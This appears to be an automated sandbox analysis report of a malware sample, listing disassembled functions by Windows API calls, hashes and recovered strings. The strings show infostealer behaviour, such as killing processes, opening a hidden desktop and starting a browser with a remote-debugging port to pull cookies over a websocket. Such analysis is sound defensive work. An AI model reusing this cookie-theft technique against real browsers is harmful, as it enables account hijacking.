                          • Instruction Fuzzy Hash: 67925074A016168FDB24CF29E948B6ABBE5BF46714F19C06DE8099B3A1E735DC81CF40
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00521291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005212B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005212BF
                          • lstrlen.KERNEL32(00544CA8), ref: 005212CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005212E7
                          • lstrcat.KERNEL32(00000000,00544CA8), ref: 005212F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0052133A
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052135C
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 00521376
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005213AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 005213D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005213E2
                          • lstrlen.KERNEL32(00541794), ref: 005213ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052140A
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521416
                          • lstrlen.KERNEL32(?), ref: 00521423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521443
                          • lstrcat.KERNEL32(00000000,?), ref: 00521451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052147A
                          • StrCmpCA.SHLWAPI(?,011ACF80), ref: 005214A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 005214E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521535
                          • StrCmpCA.SHLWAPI(?,011AD1C8), ref: 00521552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00521593
                          • lstrcpy.KERNEL32(00000000,?), ref: 005215BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005215E4
                          • StrCmpCA.SHLWAPI(?,011AD058), ref: 00521602
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521633
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052165C
                          • lstrcpy.KERNEL32(00000000,?), ref: 00521685
                          • StrCmpCA.SHLWAPI(?,011ACFE0), ref: 005216B3
                          • lstrcpy.KERNEL32(00000000,?), ref: 005216F4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052171D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521745
                          • lstrcpy.KERNEL32(00000000,?), ref: 00521796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005217BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 005217F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0052181C
                          • FindClose.KERNEL32(00000000), ref: 0052182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: b88f0d652974a7ea6109ca33a0c7ca6e9cb058a8dc4db6c2a09e934e1779f461
                          • Instruction ID: 81661e0330c48ba8895272380f2809cd2a54bd338346b6dbff02ba2b3116d88e
                          • Opcode Fuzzy Hash: b88f0d652974a7ea6109ca33a0c7ca6e9cb058a8dc4db6c2a09e934e1779f461
                          • Instruction Fuzzy Hash: 6712C375A106179BDB24EF78E889AAF7FB9BF95300F044528F846D3290DB34DC858B94
                          APIs
                          • wsprintfA.USER32 ref: 0052CBFC
                          • FindFirstFileA.KERNEL32(?,?), ref: 0052CC13
                          • lstrcat.KERNEL32(?,?), ref: 0052CC5F
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052CC71
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 0052CC8B
                          • wsprintfA.USER32 ref: 0052CCB0
                          • PathMatchSpecA.SHLWAPI(?,011A8AE0), ref: 0052CCE2
                          • CoInitialize.OLE32(00000000), ref: 0052CCEE
                            • Part of subcall function 0052CAE0: CoCreateInstance.COMBASE(0053B110,00000000,00000001,0053B100,?), ref: 0052CB06
                            • Part of subcall function 0052CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0052CB46
                            • Part of subcall function 0052CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0052CBC9
                          • CoUninitialize.COMBASE ref: 0052CD09
                          • lstrcat.KERNEL32(?,?), ref: 0052CD2E
                          • lstrlen.KERNEL32(?), ref: 0052CD3B
                          • StrCmpCA.SHLWAPI(?,0053CFEC), ref: 0052CD55
                          • wsprintfA.USER32 ref: 0052CD7D
                          • wsprintfA.USER32 ref: 0052CD9C
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0052CDB0
                          • wsprintfA.USER32 ref: 0052CDD8
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0052CDF1
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0052CE10
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 0052CE28
                          • CloseHandle.KERNEL32(00000000), ref: 0052CE33
                          • CloseHandle.KERNEL32(00000000), ref: 0052CE3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0052CE54
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052CE94
                          • FindNextFileA.KERNEL32(?,?), ref: 0052CF8D
                          • FindClose.KERNEL32(?), ref: 0052CF9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                          • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 3860919712-2388001722
                          • Opcode ID: 944e33e6644387529837b42c55ebb10fb2cce77119f93c738b71a79cc45f97aa
                          • Instruction ID: 0f82a8b86bcccc0c9553fee49c241cfac5810b07f50734fc1f2a1597dc9d3ac2
                          • Opcode Fuzzy Hash: 944e33e6644387529837b42c55ebb10fb2cce77119f93c738b71a79cc45f97aa
                          • Instruction Fuzzy Hash: 75C193759002199FDB60DF64DC49EEE7B79BF85300F008599F909A7291EB34AE84CFA1
                          APIs
                          • memset.MSVCRT ref: 00519790
                          • lstrcat.KERNEL32(?,?), ref: 005197A0
                          • lstrcat.KERNEL32(?,?), ref: 005197B1
                          • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 005197C3
                          • memset.MSVCRT ref: 005197D7
                            • Part of subcall function 00533E70: lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00533EA5
                            • Part of subcall function 00533E70: lstrcpy.KERNEL32(00000000,011A9DA8), ref: 00533ECF
                            • Part of subcall function 00533E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0051134E,?,0000001A), ref: 00533ED9
                          • wsprintfA.USER32 ref: 00519806
                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00519827
                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00519844
                            • Part of subcall function 005346A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 005346B9
                            • Part of subcall function 005346A0: Process32First.KERNEL32(00000000,00000128), ref: 005346C9
                            • Part of subcall function 005346A0: Process32Next.KERNEL32(00000000,00000128), ref: 005346DB
                            • Part of subcall function 005346A0: StrCmpCA.SHLWAPI(?,?), ref: 005346ED
                            • Part of subcall function 005346A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00534702
                            • Part of subcall function 005346A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00534711
                            • Part of subcall function 005346A0: CloseHandle.KERNEL32(00000000), ref: 00534718
                            • Part of subcall function 005346A0: Process32Next.KERNEL32(00000000,00000128), ref: 00534726
                            • Part of subcall function 005346A0: CloseHandle.KERNEL32(00000000), ref: 00534731
                          • memset.MSVCRT ref: 00519862
                          • lstrcat.KERNEL32(00000000,?), ref: 00519878
                          • lstrcat.KERNEL32(00000000,?), ref: 00519889
                          • lstrcat.KERNEL32(00000000,00544B60), ref: 0051989B
                          • memset.MSVCRT ref: 005198AF
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 005198D4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00519903
                          • StrStrA.SHLWAPI(00000000,011ADCD8), ref: 00519919
                          • lstrcpyn.KERNEL32(007493D0,00000000,00000000), ref: 00519938
                          • lstrlen.KERNEL32(?), ref: 0051994B
                          • wsprintfA.USER32 ref: 0051995B
                          • lstrcpy.KERNEL32(?,00000000), ref: 00519971
                          • memset.MSVCRT ref: 00519986
                          • Sleep.KERNEL32(00001388), ref: 005199E7
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511557
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511579
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 0051159B
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 005115FF
                            • Part of subcall function 005192B0: strlen.MSVCRT ref: 005192E1
                            • Part of subcall function 005192B0: strlen.MSVCRT ref: 005192FA
                            • Part of subcall function 005192B0: strlen.MSVCRT ref: 00519399
                            • Part of subcall function 005192B0: strlen.MSVCRT ref: 005193E6
                            • Part of subcall function 00534740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00534759
                            • Part of subcall function 00534740: Process32First.KERNEL32(00000000,00000128), ref: 00534769
                            • Part of subcall function 00534740: Process32Next.KERNEL32(00000000,00000128), ref: 0053477B
                            • Part of subcall function 00534740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0053479C
                            • Part of subcall function 00534740: TerminateProcess.KERNEL32(00000000,00000000), ref: 005347AB
                            • Part of subcall function 00534740: CloseHandle.KERNEL32(00000000), ref: 005347B2
                            • Part of subcall function 00534740: Process32Next.KERNEL32(00000000,00000128), ref: 005347C0
                            • Part of subcall function 00534740: CloseHandle.KERNEL32(00000000), ref: 005347CB
                          • CloseDesktop.USER32(?), ref: 00519A1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                          • API String ID: 2040986984-1862457068
                          • Opcode ID: 554aa665f2945fae2f0b6899b231ed031c0c10029ebd58089d5f6e86c632358f
                          • Instruction ID: 3e47c34e59ca701ba9840b9634a3388e81400df048141994e08370ce230efe92
                          • Opcode Fuzzy Hash: 554aa665f2945fae2f0b6899b231ed031c0c10029ebd58089d5f6e86c632358f
                          • Instruction Fuzzy Hash: 309175B5940209ABEB10DF64DC89FDE7BB9FF44700F108195F609A7191DB74AA848FA4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00521291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005212B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005212BF
                          • lstrlen.KERNEL32(00544CA8), ref: 005212CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005212E7
                          • lstrcat.KERNEL32(00000000,00544CA8), ref: 005212F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0052133A
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052135C
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 00521376
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005213AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 005213D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005213E2
                          • lstrlen.KERNEL32(00541794), ref: 005213ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052140A
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00521416
                          • lstrlen.KERNEL32(?), ref: 00521423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521443
                          • lstrcat.KERNEL32(00000000,?), ref: 00521451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052147A
                          • StrCmpCA.SHLWAPI(?,011ACF80), ref: 005214A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 005214E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00521535
                          • StrCmpCA.SHLWAPI(?,011AD1C8), ref: 00521552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00521593
                          • lstrcpy.KERNEL32(00000000,?), ref: 005215BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005215E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00521796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005217BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 005217F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0052181C
                          • FindClose.KERNEL32(00000000), ref: 0052182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 0ff52aafaf70e4279d2083b27cfdfed9460739fe4110f1bcfb24c7edf7bc84dc
                          • Instruction ID: cf589c62228546b2e9856b2513a931c496dab8dace5516af4eade9e027dc41ca
                          • Opcode Fuzzy Hash: 0ff52aafaf70e4279d2083b27cfdfed9460739fe4110f1bcfb24c7edf7bc84dc
                          • Instruction Fuzzy Hash: 26C1723591061A9BDB21EF74EC89AEF7FB9BF52700F044429F84693291DB34DC858B94
                          APIs
                          • wsprintfA.USER32 ref: 0052E22C
                          • FindFirstFileA.KERNEL32(?,?), ref: 0052E243
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052E263
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 0052E27D
                          • wsprintfA.USER32 ref: 0052E2A2
                          • StrCmpCA.SHLWAPI(?,0053CFEC), ref: 0052E2B4
                          • wsprintfA.USER32 ref: 0052E2D1
                            • Part of subcall function 0052EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0052EE12
                          • wsprintfA.USER32 ref: 0052E2F0
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0052E304
                          • lstrcat.KERNEL32(?,011AE4B8), ref: 0052E335
                          • lstrcat.KERNEL32(?,00541794), ref: 0052E347
                          • lstrcat.KERNEL32(?,?), ref: 0052E358
                          • lstrcat.KERNEL32(?,00541794), ref: 0052E36A
                          • lstrcat.KERNEL32(?,?), ref: 0052E37E
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0052E394
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E3D2
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E422
                          • DeleteFileA.KERNEL32(?), ref: 0052E45C
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511557
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511579
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 0051159B
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 005115FF
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0052E49B
                          • FindClose.KERNEL32(00000000), ref: 0052E4AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                          • String ID: %s\%s$%s\*
                          • API String ID: 1375681507-2848263008
                          • Opcode ID: 82d4a28e0e46f16ea14f3c51efffe6cb8454e532c5fbe9d81fc508ef6c3c4e69
                          • Instruction ID: e8de5bdf042283fa765c2051c51314cfa6178af9af8fd5a302e1e5649d615a3f
                          • Opcode Fuzzy Hash: 82d4a28e0e46f16ea14f3c51efffe6cb8454e532c5fbe9d81fc508ef6c3c4e69
                          • Instruction Fuzzy Hash: 7281957590021D9BDB20EF74EC49EEF7B79BF85300F008999B50A93191DB74AA98CF94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005116E2
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00511719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051176C
                          • lstrcat.KERNEL32(00000000), ref: 00511776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005117A2
                          • lstrcpy.KERNEL32(00000000,?), ref: 005118F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005118FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat
                          • String ID: \*.*
                          • API String ID: 2276651480-1173974218
                          • Opcode ID: ddd89c2cb480ec4342f1302ec8af5785d919c6a9a6a407015bbdb409bb168d99
                          • Instruction ID: e42adf18886de6525ee02cdbe1376e80303fcc9b8543d26640ef34c128893645
                          • Opcode Fuzzy Hash: ddd89c2cb480ec4342f1302ec8af5785d919c6a9a6a407015bbdb409bb168d99
                          • Instruction Fuzzy Hash: D8819F3491060B9BEB21EFA8D889AEF7FB5BF41700F044165FA05A7251DB349CD1CB95
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0052DD45
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0052DD4C
                          • wsprintfA.USER32 ref: 0052DD62
                          • FindFirstFileA.KERNEL32(?,?), ref: 0052DD79
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052DD9C
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 0052DDB6
                          • wsprintfA.USER32 ref: 0052DDD4
                          • DeleteFileA.KERNEL32(?), ref: 0052DE20
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0052DDED
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511557
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 00511579
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 0051159B
                            • Part of subcall function 00511530: lstrcpy.KERNEL32(00000000,?), ref: 005115FF
                            • Part of subcall function 0052D980: memset.MSVCRT ref: 0052D9A1
                            • Part of subcall function 0052D980: memset.MSVCRT ref: 0052D9B3
                            • Part of subcall function 0052D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0052D9DB
                            • Part of subcall function 0052D980: lstrcpy.KERNEL32(00000000,?), ref: 0052DA0E
                            • Part of subcall function 0052D980: lstrcat.KERNEL32(?,00000000), ref: 0052DA1C
                            • Part of subcall function 0052D980: lstrcat.KERNEL32(?,011ADF18), ref: 0052DA36
                            • Part of subcall function 0052D980: lstrcat.KERNEL32(?,?), ref: 0052DA4A
                            • Part of subcall function 0052D980: lstrcat.KERNEL32(?,011ACFC8), ref: 0052DA5E
                            • Part of subcall function 0052D980: lstrcpy.KERNEL32(00000000,?), ref: 0052DA8E
                            • Part of subcall function 0052D980: GetFileAttributesA.KERNEL32(00000000), ref: 0052DA95
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0052DE2E
                          • FindClose.KERNEL32(00000000), ref: 0052DE3D
                          • lstrcat.KERNEL32(?,011AE4B8), ref: 0052DE66
                          • lstrcat.KERNEL32(?,011AD2A8), ref: 0052DE7A
                          • lstrlen.KERNEL32(?), ref: 0052DE84
                          • lstrlen.KERNEL32(?), ref: 0052DE92
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052DED2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                          • String ID: %s\%s$%s\*
                          • API String ID: 4184593125-2848263008
                          • Opcode ID: 813797e06265b61f68567ede44173a6592b7988cd538d59791f6f1f3f1fa7c9f
                          • Instruction ID: 0b2e3a0d355e0d835e40522c3976df1fbba2529566a529d02d451b48c9f5f379
                          • Opcode Fuzzy Hash: 813797e06265b61f68567ede44173a6592b7988cd538d59791f6f1f3f1fa7c9f
                          • Instruction Fuzzy Hash: DC619575910219ABCB10EF74DC89AEE7BB9BF89300F008599F505D7291EB34AE94CF54
                          APIs
                          • wsprintfA.USER32 ref: 0052D54D
                          • FindFirstFileA.KERNEL32(?,?), ref: 0052D564
                          • StrCmpCA.SHLWAPI(?,005417A0), ref: 0052D584
                          • StrCmpCA.SHLWAPI(?,005417A4), ref: 0052D59E
                          • lstrcat.KERNEL32(?,011AE4B8), ref: 0052D5E3
                          • lstrcat.KERNEL32(?,011AE518), ref: 0052D5F7
                          • lstrcat.KERNEL32(?,?), ref: 0052D60B
                          • lstrcat.KERNEL32(?,?), ref: 0052D61C
                          • lstrcat.KERNEL32(?,00541794), ref: 0052D62E
                          • lstrcat.KERNEL32(?,?), ref: 0052D642
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052D682
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052D6D2
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0052D737
                          • FindClose.KERNEL32(00000000), ref: 0052D746
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 50252434-4073750446
                          • Opcode ID: 061b7bd9521fabb6ac8039f577b70d03aa969fcb84e452dc0bf8b1e543c24eda
                          • Instruction ID: 14df92bdb6a34c3e64234f320a2fafbee9eeef82dce86836e726a766db53b65f
                          • Opcode Fuzzy Hash: 061b7bd9521fabb6ac8039f577b70d03aa969fcb84e452dc0bf8b1e543c24eda
                          • Instruction Fuzzy Hash: 0A61767591011A9BDB20EF74DC88ADE7BB9FF89300F0085A5E64993251DB38AA94CF90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                          • API String ID: 909987262-758292691
                          • Opcode ID: cd959ca846d71e47cc8f5f38d4ce7b6f34242c68e66d6ccedb64e260295812d7
                          • Instruction ID: cbec1f47aa91896c2e9b90e6d9df6e44de50d1d4e6c9b4283b1b896f2c03b265
                          • Opcode Fuzzy Hash: cd959ca846d71e47cc8f5f38d4ce7b6f34242c68e66d6ccedb64e260295812d7
                          • Instruction Fuzzy Hash: CAA25971D012699FDB20CFA8C8807EDBBB6BF89300F1485AAD518A7241EB755E85CF91
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005223D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005223F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00522402
                          • lstrlen.KERNEL32(\*.*), ref: 0052240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00522436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052246A
